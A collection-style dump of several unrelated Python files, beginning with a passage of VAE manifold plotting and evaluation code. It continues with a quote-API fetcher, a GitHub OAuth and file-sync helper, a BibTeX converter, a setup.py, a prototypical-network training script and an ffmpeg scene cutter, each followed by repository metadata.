samples = load_data_from_folder_if_from_dataset(sample_folder,
dataset_name)
if not plot_4d:
if not plot_slice:
sz = 2
sample_sz = 5
plot_data = [
go.Scatter3d(x=samples[model_idx_to_plot][:, 0],
y=samples[model_idx_to_plot][:, 1],
z=samples[model_idx_to_plot][:, 2],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter3d(x=training_data[:, 0],
y=training_data[:, 1],
z=training_data[:, 2],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac)),
go.Scatter3d(x=recon[model_idx_to_plot][:, 0],
y=recon[model_idx_to_plot][:, 1],
z=recon[model_idx_to_plot][:, 2],
name="Reconstructed train",
mode='markers',
marker=dict(size=sz, opacity=opac))
]
else:
# 2D: only plot points who have -0.025 < z < 0.025
# (s[:, 0] < 0) & (s[:, 1] >= 0) & # for x < 0 and y < 0 too
sz = 12
sample_sz = 18
opac = 1
slice_width = 0.03
s = samples[model_idx_to_plot]
samples_to_plot = s[(s[:, 2] >= -slice_width) &
(s[:, 2] <= slice_width), :]
r = recon[model_idx_to_plot]
recon_to_plot = r[(r[:, 2] >= -slice_width) &
(r[:, 2] <= slice_width), :]
training_to_plot = training_data[
(training_data[:, 2] >= -slice_width) &
(training_data[:, 2] <= slice_width), :]
plot_data = [
go.Scatter(x=samples_to_plot[:, 0],
y=samples_to_plot[:, 1],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter(x=training_to_plot[:, 0],
y=training_to_plot[:, 1],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac / 2)),
go.Scatter(x=recon_to_plot[:, 0],
y=recon_to_plot[:, 1],
name="Reconstructed train",
mode='markers',
marker=dict(size=sz, opacity=opac))
]
else:
sz = 2
sample_sz = 5
plot_data = [
go.Scatter3d(x=samples[model_idx_to_plot][:, 0],
y=samples[model_idx_to_plot][:, 1],
z=samples[model_idx_to_plot][:, 2],
name="Samples",
mode='markers',
marker=dict(size=sample_sz,
opacity=opac,
color=samples[2][:, 3],
colorscale='blues')),
go.Scatter3d(x=training_data[:, 0],
y=training_data[:, 1],
z=training_data[:, 2],
name="Training data",
mode='markers',
marker=dict(size=sz,
opacity=opac,
color=training_data[:, 3],
colorscale='purpor')),
go.Scatter3d(x=recon[model_idx_to_plot][:, 0],
y=recon[model_idx_to_plot][:, 1],
z=recon[model_idx_to_plot][:, 2],
name="Reconstructed train",
mode='markers',
marker=dict(size=sz,
opacity=opac,
color=recon[2][:, 3],
colorscale='greens'))
]
fig = go.Figure(data=plot_data)
fig.update_layout(
title=f"Visualization of the VAE manifold for {dataset_name} dataset")
# fig.update_layout(height=800, width=1050) # could be useful for slice
fig.show()
def create_gt_feat(dataset_option):
""" 1:sphere, 2:circle, 3:3dof, 4:6dof """
if dataset_option == 1:
feat = SphereFeature(r=1.0)
elif dataset_option == 2:
feat = LoopFeature(r=1.0)
else:
print(f"Error: Dataset option {dataset_option} invalid")
return
return feat
def evaluate_on_gt_manifold(gt_dataset, data, threshold=0.1):
"""
gt_dataset can be string ("sphere", "3dof", etc) or int (1,2,3)
-- will be converted to int if given as string
returns:
Number of data points below threshold away from feat
Number of data points total
(d,) numpy array of distances of each data point from the feat
"""
dataset_id_dict = dict({
"sphere": 1,
"circle": 2,
"3dof": 3,
"6dof": 4,
})
if isinstance(gt_dataset, str):
gt_dataset = dataset_id_dict[gt_dataset]
if gt_dataset >= 3:
print(
"WARNING: eval statistics invalid for this run. 3DOF (Plane) and 6DOF (Orient) datasets are not supported for this evaluation function."
)
return 0, 1, [1] # no support for 6dof dataset in this release
feat = create_gt_feat(dataset_option=gt_dataset)
n_success = 0
n_total = data.shape[0]
distances = np.empty(n_total)
for i, q in enumerate(data):
q = q.astype('float64')
dist = np.linalg.norm(feat.y(q))
distances[i] = dist
if dist < threshold:
n_success += 1
return n_success, n_total, distances
def get_mean_std(x):
return np.mean(x), np.std(x)
def get_and_print_eval_stats(foldername, dataset, threshold=0.1):
""" given foldername where all npy files to be evaluated are, and the name
of the dataset, returns mean and std % success, mean and std of distances of
those npy datasets to the ground truth manifold. """
ds = load_data_from_folder_if_from_dataset(foldername, dataset)
pct_successes, all_distances = [], []
for d in ds:
n_success, n_total, distances = evaluate_on_gt_manifold(
gt_dataset=dataset, data=d, threshold=threshold)
pct_successes.append(100 * (n_success / n_total))
all_distances.extend(distances)
pct_mu, pct_std = get_mean_std(pct_successes)
dist_mu, dist_std = get_mean_std(all_distances)
print("==============")
print(
f"Evaluation for {dataset} data in {foldername} (threshold={threshold}):"
)
print(
f"Mean and std of pct success: {round(pct_mu,3)} \pm {round(pct_std,3)}"
)
print(
f"Mean and std of distance: {round(dist_mu,3)} \pm {round(dist_std,3)}"
)
print("==============")
return pct_mu, pct_std, dist_mu, dist_std
def full_vae_evaluation_for_dataset(dataset_name,
training_data_filepath,
experiment_trials_foldername,
experiment_folder="experiment_runs",
do_barplots=False,
x_axis_param="n_trials",
plot_metrics=None,
ignore_metrics=['time', 'kld'],
subplots=False,
do_save_samples=True,
n_samples=1000,
saved_samples_folder="samples/",
do_save_recon=True,
saved_recon_folder="reconstruction/",
do_plot=True,
plot_4d=False,
do_eval=True,
do_plot_slice=False,
threshold=0.1):
print(f"Running full evaluation for dataset {dataset_name}...")
training_data = np.load(training_data_filepath)
# Get numerical results from training
a = ResultsAnalyzer(experiment_folder, experiment_trials_foldername)
_ = a.get_all_runs()
_ = a.get_all_specifications()
if do_barplots:
print(f"Producing barplot for parameter {x_axis_param}...")
a.barplot_for_parameter(parameter_name=x_axis_param,
plot_metrics=plot_metrics,
ignore_metrics=ignore_metrics,
subplots=subplots)
plt.show(block=False)
# get/save samples and reconstructed data
for name, run in a.runs.items():
result = run["result"]
vae = result["vae"]
if do_save_samples:
print(f"Producing and saving samples from experiment {name}...")
create_dir_if_not_exist(saved_samples_folder)
fname = saved_samples_folder + dataset_name + '_' + name + "_samples.npy"
samples = np.array([vae.sample() for _ in range(n_samples)])
np.save(fname, samples)
if do_save_recon:
print(
f"Producing and saving reconstructed data from experiment {name}..."
)
create_dir_if_not_exist(saved_recon_folder)
fname = saved_recon_folder + dataset_name + '_' + name + "_recon.npy"
configs = vae.forward(
torch.from_numpy(training_data).float()).detach().numpy()
np.save(fname, configs)
# visualize training, reconstructed, and sample data
if do_plot:
print("Plotting training, reconstructed, and sampled data...")
plot_ly(dataset_name,
training_data,
saved_recon_folder,
saved_samples_folder,
plot_slice=do_plot_slice)
if do_eval:
print("Computing evaluation statistics...")
get_and_print_eval_stats(foldername=saved_recon_folder,
dataset=dataset_name,
threshold=threshold)
get_and_print_eval_stats(foldername=saved_samples_folder,
dataset=dataset_name,
threshold=threshold)
if __name__ == '__main__':
experiment_folder = "experiment_runs/"
do_barplots = True # True: generate barplots of VAE training metrics
do_save_samples = True # True: save newly generated VAE samples
do_save_recon = True # True: save the VAE-reconstructed gt data
do_plot = True # True: generate plotly plots of learned manifolds
do_eval = True # True: get success rates and distance statistics
do_plot_slice = False # True: plot slices of the manifolds near z=0
do_ecomann_plot = True # True: plot the ECoMaNN samples for Plane
if do_ecomann_plot:
samples = np.load("ecmnn_projected_data/ecmnn_3dof_projected.npy")
training_data = np.load("../data/trajectories/3dof_v2_traj.npy")
opac = 0.5
if do_plot_slice:
# 2D: only plot points who have -slice_width <= z <= slice_width
sz = 12
sample_sz = 18
opac = 1
slice_width = 0.03
samples = samples[(samples[:, 2] >= -slice_width) &
(samples[:, 2] <= slice_width), :]
training_data = training_data[
(training_data[:, 2] >= -slice_width) &
(training_data[:, 2] <= slice_width), :]
plot_data = [
go.Scatter(x=samples[:, 0],
y=samples[:, 1],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter(x=training_data[:, 0],
y=training_data[:, 1],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac / 2))
]
title = "Visualization of the slice near z=0 of the ECoMaNN manifold for 3dof"
else:
sz = 2
sample_sz = 5
plot_data = [
go.Scatter3d(x=samples[:, 0],
y=samples[:, 1],
z=samples[:, 2],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter3d(x=training_data[:, 0],
y=training_data[:, 1],
z=training_data[:, 2],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac))
]
title = "Visualization of the ECoMaNN manifold for 3dof"
fig = go.Figure(data=plot_data)
fig.update_layout(title=title)
# fig.update_layout(height=800, width=1050) # could be useful for slice
fig.show()
full_vae_evaluation_for_dataset(
dataset_name="sphere",
training_data_filepath=
"../data/trajectories/synthetic_unit_sphere_wo_noise.npy",
experiment_trials_foldername='sphere_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder)
full_vae_evaluation_for_dataset(
dataset_name="circle",
training_data_filepath="../data/trajectories/circle_loop.npy",
experiment_trials_foldername='circle_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder)
full_vae_evaluation_for_dataset(
dataset_name="3dof",
training_data_filepath="../data/trajectories/3dof_v2_traj.npy",
experiment_trials_foldername='3DOF_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder)
full_vae_evaluation_for_dataset(
dataset_name="6dof",
training_data_filepath="../data/trajectories/6dof_traj.npy",
experiment_trials_foldername='6DOF_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder,
plot_4d=True)
if do_barplots:
plt.show()
print("Done.")
| 39.949593 | 148 | 0.53421 | 2,824 | 24,569 | 4.42068 | 0.144476 | 0.033643 | 0.012816 | 0.017943 | 0.418536 | 0.356456 | 0.297741 | 0.263377 | 0.256328 | 0.248798 | 0 | 0.014024 | 0.373112 | 24,569 | 614 | 149 | 40.014658 | 0.79652 | 0.124303 | 0 | 0.36961 | 0 | 0.00616 | 0.096437 | 0.0169 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032854 | false | 0 | 0.020534 | 0.00616 | 0.090349 | 0.036961 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2fd8380ddf10eda9c6d44420cfcef69f1e223b3 | 1,062 | py | Python | app/request.py | lorderonnie/ronniesblog | 11bb3ebf96e49a52c5fbc36f098e262e03334872 | [
"MIT"
] | null | null | null | app/request.py | lorderonnie/ronniesblog | 11bb3ebf96e49a52c5fbc36f098e262e03334872 | [
"MIT"
] | null | null | null | app/request.py | lorderonnie/ronniesblog | 11bb3ebf96e49a52c5fbc36f098e262e03334872 | [
"MIT"
] | null | null | null | import urllib.request,json
from .models import Quote
get_quote_url='http://quotes.stormconsultancy.co.uk/random.json'
def get_quote():
'''
This gets thejson respond and allows you to access the url information
'''
with urllib.request.urlopen(get_quote_url) as url:
get_quote_data = url.read()
get_quote_response = json.loads(get_quote_data)
quote_results = None
if get_quote_response:
quote_results_list = get_quote_response
quote_results = process_results(quote_results_list)
return quote_results
def process_results(quote_list):
'''
This function will process the results and return them as objects
'''
quote_results=[]
id = quote_list.get('id')
author = quote_list.get('author')
quote = quote_list.get('quote')
if quote:
quote_object = Quote(id,author,quote)
quote_results.append(quote_object)
return quote_results
| 22.125 | 74 | 0.619586 | 127 | 1,062 | 4.92126 | 0.377953 | 0.1152 | 0.0768 | 0.0672 | 0.0896 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.304143 | 1,062 | 48 | 75 | 22.125 | 0.845737 | 0.12806 | 0 | 0.095238 | 0 | 0 | 0.06808 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39018e67f03e1e9f61e5f82b904d4555c3dc4529 | 3,537 | py | Python | github_sync.py | polifonia-project/polifonia_dashboard | 7a2ad585eb5adc3726ff8c6585cc7d1061507e77 | [
"0BSD"
] | null | null | null | github_sync.py | polifonia-project/polifonia_dashboard | 7a2ad585eb5adc3726ff8c6585cc7d1061507e77 | [
"0BSD"
] | 2 | 2022-03-09T21:43:19.000Z | 2022-03-15T18:13:51.000Z | github_sync.py | polifonia-project/polifonia_dashboard | 7a2ad585eb5adc3726ff8c6585cc7d1061507e77 | [
"0BSD"
] | null | null | null | import os , json
import requests
from github import Github, InputGitAuthor
import conf
dir_path = os.path.dirname(os.path.realpath(__file__))
# OAUTH APP
clientId = conf.clientID
clientSecret = conf.clientSecret
def ask_user_permission(code):
""" get user permission when authenticating via github"""
res = None
body = {
"client_id" : clientId,
"client_secret" : clientSecret,
"code" : code
}
req = requests.post('https://github.com/login/oauth/access_token', data=body,
headers={"accept": "application/json"})
print(body, req)
if req.status_code == 200:
res = req.json()
return res
def get_user_login(res):
""" get github user information """
userlogin, usermail = None, None
print("user requesting github login:", res)
access_token = res["access_token"]
req_user = requests.get("https://api.github.com/user",
headers={"Authorization": "token "+access_token})
if req_user.status_code == 200:
res_user = req_user.json()
userlogin = res_user["login"]
usermail = res_user["email"]
return userlogin, usermail, access_token
def get_github_users(userlogin):
""" match user with collaborators of github repository"""
is_valid_user = False
if conf.token != '' and conf.owner != '' and conf.repo_name != '':
req = requests.get("https://api.github.com/repos/"+conf.owner+"/"+conf.repo_name+"/collaborators",
headers={"Authorization": "token "+conf.token})
if req.status_code == 200:
users = [user['login'] for user in req.json()]
if userlogin in users:
is_valid_user = True
return is_valid_user
def push(local_file_path, branch='main', gituser=None, email=None, bearer_token=None, action=''):
""" create a new file or update an existing file.
the remote file has the same relative path of the local one"""
token = conf.token if bearer_token is None else bearer_token
user = conf.author if gituser is None else gituser
usermail = conf.author_email if email is None else email
owner = conf.owner
repo_name = conf.repo_name
g = Github(token)
repo = g.get_repo(owner+"/"+repo_name)
author = InputGitAuthor(user,usermail) # commit author
try:
contents = repo.get_contents(local_file_path) # Retrieve the online file to get its SHA and path
update=True
message = "updated file "+local_file_path+' '+action
except:
update=False
message = "created file "+local_file_path
with open(local_file_path) as f: # Both create/update file replace the file with the local one
data = f.read() # could be done in a smarter way
if update == True: # If file already exists, update it
repo.update_file(contents.path, message, data, contents.sha, author=author) # Add, commit and push branch
else:
try:
# If file doesn't exist, create it in the same relative path of the local file
repo.create_file(local_file_path, message, data, branch=branch, author=author) # Add, commit and push branch
except Exception as e:
print(e)
def delete_file(local_file_path, branch, gituser=None, email=None, bearer_token=None):
""" delete files form github """
token = conf.token if bearer_token is None else bearer_token
user = conf.author if gituser is None else gituser
usermail = conf.author_email if email is None else email
owner = conf.owner
repo_name = conf.repo_name
g = Github(token)
repo = g.get_repo(owner+"/"+repo_name)
author = InputGitAuthor(user,usermail) # commit author
contents = repo.get_contents(local_file_path)
message = "deleted file "+local_file_path
repo.delete_file(contents.path, message, contents.sha, branch=branch)
| 33.685714 | 112 | 0.729714 | 528 | 3,537 | 4.746212 | 0.248106 | 0.035914 | 0.046688 | 0.033919 | 0.34158 | 0.327215 | 0.304868 | 0.197925 | 0.197925 | 0.197925 | 0 | 0.003022 | 0.158044 | 3,537 | 104 | 113 | 34.009615 | 0.838482 | 0.171897 | 0 | 0.282051 | 0 | 0 | 0.104571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064103 | false | 0 | 0.051282 | 0 | 0.153846 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3901f5052217f31c1711d03d87f6b9db3214ccf0 | 1,928 | py | Python | pubs_converter/converter.py | IntelAgir-Research-Group/intelagir-research-group.github.io | 5ab3572c1ac08b4819b2a0df26516d6127ce0a35 | [
"MIT"
] | null | null | null | pubs_converter/converter.py | IntelAgir-Research-Group/intelagir-research-group.github.io | 5ab3572c1ac08b4819b2a0df26516d6127ce0a35 | [
"MIT"
] | null | null | null | pubs_converter/converter.py | IntelAgir-Research-Group/intelagir-research-group.github.io | 5ab3572c1ac08b4819b2a0df26516d6127ce0a35 | [
"MIT"
] | 2 | 2021-02-08T16:23:33.000Z | 2022-01-05T20:19:44.000Z | # install package before running:
# pip install bibtexparser
import bibtexparser
with open('publications.bib') as bibtex_file:
# bib_database = bibtexparser.load(bibtex_file)
bib_database = bibtexparser.bparser.BibTexParser(common_strings=True).parse_file(bibtex_file)
md_string = ""
for entry in bib_database.entries:
bib_type = entry["ENTRYTYPE"]
if bib_type == "article":
venue = entry["journal"]
md_type = "article"
elif bib_type == "inproceedings":
venue = entry["booktitle"]
md_type = "conference"
elif bib_type == "inbook":
venue = entry["title"]
md_type = "book"
elif bib_type == "phdthesis":
venue = entry["organization"]
md_type = "thesis"
elif bib_type == "misc":
venue = ""
md_type = "other"
elif bib_type == "book":
venue = entry["publisher"]
md_type = "book"
else:
print(bib_type)
md_string += " - title: "
md_string += "\"" + entry["title"] + "\"\n"
md_string += " authors: "
md_string += entry["author"] + "\n"
md_string += " type: "
md_string += md_type + "\n"
md_string += " venue: "
md_string += "\"" + venue + "\"\n"
md_string += " doi: "
doi = entry["doi"] if "doi" in entry else ""
md_string += doi + "\n"
md_string += " url: "
url = entry["url"] if "url" in entry else ""
md_string += url + "\n"
md_string += " year: "
md_string += entry["year"] + "\n"
# break
# print(md_string)
with open('output-raw.md', "w") as out:
out.write(md_string)
# - title: "Online Experiment-Driven Learning and Adaptation"
# authors: Ilias Gerostathopoulos, Alexander Auf der Strasse
# venue: "Model-Based Engineering of Collaborative Embedded Systems, Springer"
# doi: https://doi.org/10.1007/978-3-030-62136-0_15
# pdf: 2021-CrestBook-IG-chapter.pdf
# year: 2021
# type: bookChapters | 31.606557 | 97 | 0.604772 | 238 | 1,928 | 4.726891 | 0.403361 | 0.120889 | 0.048 | 0.037333 | 0.092444 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019931 | 0.245332 | 1,928 | 61 | 98 | 31.606557 | 0.753265 | 0.226141 | 0 | 0.045455 | 0 | 0 | 0.199324 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022727 | 0 | 0.022727 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39029f6c2c31cf4b23816a7a341ec805e7421baa | 698 | py | Python | [OPMan]/Seasonals [TV]/2011-4 - Fall/[a8292] Ben-To/setup.py | LightArrowsEXE/Encoding-Projects | 4ea96a5b25a7710f615ada5ff25949c496492b53 | [
"MIT"
] | 57 | 2019-01-31T17:32:46.000Z | 2022-03-23T05:46:51.000Z | [OPMan]/Seasonals [TV]/2011-4 - Fall/[a8292] Ben-To/setup.py | LightArrowsEXE/Encoding-Projects | 4ea96a5b25a7710f615ada5ff25949c496492b53 | [
"MIT"
] | null | null | null | [OPMan]/Seasonals [TV]/2011-4 - Fall/[a8292] Ben-To/setup.py | LightArrowsEXE/Encoding-Projects | 4ea96a5b25a7710f615ada5ff25949c496492b53 | [
"MIT"
] | 12 | 2019-04-30T06:16:13.000Z | 2022-03-14T16:15:07.000Z | #!/usr/bin/env python3
import setuptools
with open("requirements.txt") as fh:
install_requires = fh.read()
name = "bento_filters"
version = "1.0.0"
release = "1.0.0"
setuptools.setup(
name=name,
version=release,
author="LightArrowsEXE",
author_email="Lightarrowsreboot@gmail.com",
description="Filtering functions for [◯PMan] Ben-To!",
packages=["bento_filters"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_data={
'trdr_filters': ['py.typed'],
},
install_requires=install_requires,
python_requires='>=3.9',
)
| 23.266667 | 58 | 0.640401 | 79 | 698 | 5.556962 | 0.721519 | 0.102506 | 0.013667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018116 | 0.209169 | 698 | 29 | 59 | 24.068966 | 0.775362 | 0.030086 | 0 | 0 | 0 | 0 | 0.390533 | 0.039941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39030dc4ca3d919715e730ef09db812f228c6f4a | 5,256 | py | Python | nips17_proto/proto.py | hli2020/proto_net | e95ee26a2d68ecdb6ddd701b5ef4029202e33742 | [
"MIT"
] | 2 | 2019-07-06T08:04:51.000Z | 2019-10-18T12:27:16.000Z | nips17_proto/proto.py | hli2020/proto_net | e95ee26a2d68ecdb6ddd701b5ef4029202e33742 | [
"MIT"
] | null | null | null | nips17_proto/proto.py | hli2020/proto_net | e95ee26a2d68ecdb6ddd701b5ef4029202e33742 | [
"MIT"
] | 1 | 2021-01-26T02:56:46.000Z | 2021-01-26T02:56:46.000Z | # coding=utf-8
from tqdm import tqdm
import sys
import argparse
from torch import optim
from basic_opt import *
from prototypical_loss import prototypical_loss as loss_fn
from protonet import ProtoNet
sys.path.append(os.getcwd())
from dataset.data_loader import data_loader
from torch.optim.lr_scheduler import MultiStepLR, StepLR
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-dataset', type=str, default='omniglot') # mini-imagenet
# used in data_loader.py for omniglot
parser.add_argument('-classes_per_it_tr', type=int, default=60) # just the N-way
parser.add_argument('-classes_per_it_val', type=int, default=5)
# used in 'init_sampler' method
parser.add_argument('-k_shot', type=int, default=5) # old name: num_support_tr
parser.add_argument('-k_query', type=int, default=5) # old name: num_query_tr
parser.add_argument('-num_support_val', type=int, default=5) # just the k_shot for validation
parser.add_argument('-num_query_val', type=int, default=15) # just the k_query for validation
parser.add_argument('-gpu_id', type=int, nargs='+', default=0)
parser.add_argument('-distance', type=str, help='cosine or euclidean', default='euclidean')
return parser
# PARAMS
opts = get_basic_parser(get_parser()).parse_args()
opts.method = 'proto'
setup(opts)
# CREATE MODEL
net = ProtoNet().to(opts.device)
# RESUME (fixme with appropriate epoch and iter)
if os.path.exists(opts.model_file):
print_log('loading previous best checkpoint [{}] ...'.format(opts.model_file), opts.log_file)
net.load_state_dict(torch.load(opts.model_file))
if opts.multi_gpu:
print_log('Wrapping network into multi-gpu mode ...', opts.log_file)
net = torch.nn.DataParallel(net)
# PREPARE DATA
train_db, val_db, test_db, _ = data_loader(opts)
# MISC
# TODO: original repo don't have weight decay
optimizer = optim.Adam(net.parameters(), lr=opts.lr, weight_decay=opts.weight_decay)
# scheduler = MultiStepLR(optimizer, milestones=opts.scheduler, gamma=opts.lr_scheduler_gamma)
scheduler = StepLR(optimizer, gamma=opts.lr_scheduler_gamma, step_size=opts.lr_scheduler_step)
# PIPELINE
if val_db is None:
best_state = None
train_loss, train_acc, val_loss, val_acc, best_acc = [], [], [], [], 0
for epoch in range(opts.nep):
old_lr = optimizer.param_groups[0]['lr']
scheduler.step()
new_lr = optimizer.param_groups[0]['lr']
if epoch == 0:
print_log('\tInitial lr is {:.8f}\n'.format(old_lr), opts.log_file)
if new_lr != old_lr:
print_log('\tLR changes from {:.8f} to {:.8f} at epoch {:d}\n'.format(old_lr, new_lr, epoch), opts.log_file)
tr_iter = iter(train_db)
for batch in tqdm(tr_iter):
net.train()
x, y = batch[0].to(opts.device), batch[1].to(opts.device)
# TODO use k_query or not?
loss, acc = loss_fn(net(x), target=y, n_support=opts.k_shot,
distance=opts.distance, device=opts.device)
optimizer.zero_grad()
loss.backward()
optimizer.step()
train_loss.append(loss.item())
train_acc.append(acc.item())
# ONE EPOCH ENDS
avg_loss = np.mean(train_loss[-opts.iterations:]) # TODO: why need iterations?
avg_acc = np.mean(train_acc[-opts.iterations:])
print_log('Avg Train Loss: {:.5f}, Avg Train Acc: {:.5f}'.format(avg_loss, avg_acc), opts.log_file)
if val_db is None:
continue
val_iter = iter(val_db)
net.eval()
for batch in val_iter:
x, y = batch[0].to(opts.device), batch[1].to(opts.device)
loss, acc = loss_fn(net(x), target=y, n_support=opts.num_support_val,
distance=opts.distance, device=opts.device)
val_loss.append(loss.item())
val_acc.append(acc.item())
avg_loss = np.mean(val_loss[-opts.iterations:])
avg_acc = np.mean(val_acc[-opts.iterations:])
postfix = ' (Best)' if avg_acc >= best_acc else ' (Best: {:.5f})'.format(best_acc)
print_log('Avg Val Loss: {:.5f}, Avg Val Acc: {:.5f}{}'.format(avg_loss, avg_acc, postfix), opts.log_file)
if avg_acc >= best_acc:
best_acc = avg_acc
if opts.multi_gpu:
torch.save(net.module.state_dict(), opts.model_file)
else:
torch.save(net.state_dict(), opts.model_file)
print_log('[epoch {} / iter {}] best model saved to: {}'.format(
epoch, len(train_db), opts.model_file), file=opts.log_file)
best_acc = avg_acc
best_state = net.state_dict()
# TRAINING ENDS
if best_state is not None:
net.load_state_dict(best_state) # fixme when multi gpu, net.module()
print_log('Testing with best model ...', opts.log_file)
avg_acc = list()
for epoch in range(10):
test_iter = iter(test_db)
for batch in test_iter:
x, y = batch
x, y = batch[0].to(opts.device), batch[1].to(opts.device)
_, acc = loss_fn(net(x), target=y, n_support=opts.k_shot,
distance=opts.distance, device=opts.device)
avg_acc.append(acc.item())
avg_acc = np.mean(avg_acc)
print_log('Test Acc: {:.6f}'.format(avg_acc), opts.log_file)
| 38.086957 | 116 | 0.660769 | 787 | 5,256 | 4.207116 | 0.23507 | 0.023558 | 0.04621 | 0.018121 | 0.279976 | 0.163697 | 0.120205 | 0.090607 | 0.090607 | 0.090607 | 0 | 0.00742 | 0.205099 | 5,256 | 137 | 117 | 38.364964 | 0.785065 | 0.107496 | 0 | 0.122449 | 0 | 0 | 0.107992 | 0 | 0 | 0 | 0 | 0.007299 | 0 | 1 | 0.010204 | false | 0 | 0.091837 | 0 | 0.112245 | 0.091837 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39047cc2529d32fdf0736bc253ad9e235e31b909 | 2,141 | py | Python | scene_cutter/scene_cutter.py | Zselter07/ffmpeg_scene_cutter | b78237acfe233a1897ef5d12a7745589d21ef0c4 | [
"MIT"
] | null | null | null | scene_cutter/scene_cutter.py | Zselter07/ffmpeg_scene_cutter | b78237acfe233a1897ef5d12a7745589d21ef0c4 | [
"MIT"
] | null | null | null | scene_cutter/scene_cutter.py | Zselter07/ffmpeg_scene_cutter | b78237acfe233a1897ef5d12a7745589d21ef0c4 | [
"MIT"
] | null | null | null | import os
from typing import Optional, List
from kcu import sh, kpath
def create_scenes(
in_path: str,
output_folder_path: str,
threshold: float=0.5,
min_scene_duration: float=1.5,
max_scene_duration: float=30,
debug: bool=False
) -> Optional[List[str]]:
os.makedirs(output_folder_path, exist_ok=True)
timestamps_path = os.path.join(output_folder_path, 'timestamps')
scene_paths = []
if __create_timestamp_file(in_path, timestamps_path, threshold=threshold, debug=debug):
timestamps = __get_timestamps_from_file(timestamps_path)
if timestamps:
timestamps.insert(0, 0)
for index, start_ts in enumerate(timestamps[:-1]):
start_ts += 0.05
duration = timestamps[index+1] - start_ts -0.05
if duration < min_scene_duration or duration > max_scene_duration:
continue
scene_path = os.path.join(output_folder_path, str(index) + 'video.mp4')
__create_scene(in_path, scene_path, start_ts, duration, debug=debug)
scene_paths.append(scene_path)
os.remove(timestamps_path)
return scene_paths
return None
# Threshold - the scene change detection score values are between [0-1].
# PRIVATE METHODS
def __create_timestamp_file(in_path: str, out_path: str, threshold: float, debug: bool=False) -> bool:
sh.sh(
'ffmpeg -y -i {} -filter:v "select=\'gt(scene,{})\',showinfo" -f null - 2> {}'.format(in_path, threshold, out_path),
debug=debug
)
return os.path.exists(out_path)
def __get_timestamps_from_file(in_path: str) -> Optional[List[float]]:
with open(in_path, 'r') as file:
video_data = file.read().replace('\n', '')
return [float(x.split(' ')[0]) for x in video_data.split('pts_time:')[1:]]
def __create_scene(in_path: str, out_path: str, start_ts: str, duration: str, debug: bool=False) -> bool:
sh.sh(
'ffmpeg -y -ss {} -t {} -i {} {} -async 1'.format(start_ts, duration, in_path, out_path),
debug=debug
)
